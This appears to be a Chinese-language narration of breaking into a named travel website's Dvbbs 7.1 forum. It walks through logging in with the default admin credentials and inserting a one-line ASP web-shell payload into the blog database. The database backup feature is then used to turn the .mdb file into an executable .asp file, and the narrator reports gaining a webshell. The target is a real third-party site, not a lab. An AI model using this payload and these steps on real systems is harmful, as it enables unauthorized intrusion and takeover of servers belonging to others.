来看看这个网站 http://www.5195abc.com 一个和旅游有关的网站

有个论坛是 Powered By Dvbbs Version 7.1.0 Sp1 的 我们来看看

这个论坛管理员的帐号后台和前台都是一样的默认密码 admin admin888

好我们先进去 进入后台了

到这里有很多获得WEBSHELL的方法 我们这次用Dvbbs7。1自带的的BOKE来得到webshell

我已经激活了一个博客了

先在里面添加链接的版面

再在其中插入一句话木马到数据库 ：<<%execute request("value")%>

下面通过博客数据库恢复来把.mdb转化为.asp的文件 BOKE数据库一般是boke/data/dvboke.mdb

好，我们看看行不行

有点慢 成功了 这些乱码就是数据库代码

Microsoft VBScript 运行时错误 错误 ’800a000d’

类型不匹配: ’Execute’

/bbs/boke/data/dvboke.asp，行 843

说明我们的木马代码运行了 木马已经再数据库中了 下面我们写入木马

成功了！

写入更强的木马

成功获得了WEBSHELL

今天就到这 88